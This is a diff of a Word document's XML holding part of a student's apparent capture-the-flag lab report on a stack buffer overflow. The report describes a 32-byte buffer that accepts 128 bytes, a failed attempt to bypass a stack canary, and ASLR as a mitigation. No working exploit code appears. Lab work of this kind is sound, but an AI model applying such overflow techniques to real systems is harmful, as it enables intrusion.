+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is initialized with value 1. A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>while</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-loop makes sure the program continues until a user inputs a newline only. In the loop body, the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>line</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> number is printed and subsequently incremented.  The structure </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>locals</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> contains a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of 32-byte capacity, as well as a poiner </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>line_pointer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> which points to the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>line</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> variable, i.e. it is assigned the address of this variable. User input upto 128 bytes is stored in the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> array. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">To exploit the code and capture the flag, I initially started a similar approach to 02. However, after spending days on end attempting to solve the problem and bypassing the canary, I eventually lost track and I am more confused than I was to begin with. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>I located the address of the buffer as ----, and tried reaching the canary by adding --- to it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I also tried brute forcing its location in memory by looping through addresses 0x7ffffffff000-0x7fffffffb000 (somewhat similar to Hadi Alkadiri’s thurough pseudo code posted on Discord general server 20.09.2023 21:44), but to no use. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>I cannot wait to see the solution to this task and realise what I’ve missed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Towards the end of trying out several different approaches and techniques, I had a lot of issues connecting to the server, and also got EOFError on different points of execution, making it an impossible task to try out new things. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Additional Questions</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>This attack wouldn’t actually work on a modern system with default features enabled. Why?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>TODO</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>https://www.fortinet.com/resources/cyberglossary/buffer-overflow#:~:text=A%20buffer%20overflow%20attack%20typically,composition%20or%20size%20of%20data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Default features usually includes address space layout randomization, and so it would be “impossible” to locate the stack addresses in memory on a modern system. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>User input is stored in the buffer, but the buffer has proper no bounds checking on the size of this input. There are also no restrictions on what kind of input the user can give, and so they are free to insert malicious and exploitative input. This makes it possible to overflow the buffer and overwrite the return address.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>TODO</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
@@ -6788,9 +7971,8 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38653337" wp14:editId="61E2F44D">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A048ACA" wp14:editId="4B4D5DEB">
             <wp:extent cx="5972810" cy="4277360"/>
             <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
             <wp:docPr id="1470968475" name="Picture 1" descr="A computer screen shot of a computer program&#10;&#10;Description automatically generated"/>
@@ -6891,7 +8073,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51EA301D" wp14:editId="6CEB0FF4">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7218E7D8" wp14:editId="408343C1">
             <wp:extent cx="5972810" cy="3073400"/>
             <wp:effectExtent l="0" t="0" r="8890" b="0"/>
             <wp:docPr id="2096153518" name="Picture 1" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
@@ -6944,42 +8126,12 @@
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Is the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>argv</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> address the address of the canary?</w:t>
-      </w:r>
-    </w:p>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:headerReference w:type="default" r:id="rId21"/>
       <w:footerReference w:type="default" r:id="rId22"/>
@@ -7499,6 +8651,118 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4B9D1235"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="819CBB28"/>
+    <w:lvl w:ilvl="0" w:tplc="30823390">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:eastAsia="Times New Roman" w:hAnsi="Wingdings" w:cs="Times New Roman" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
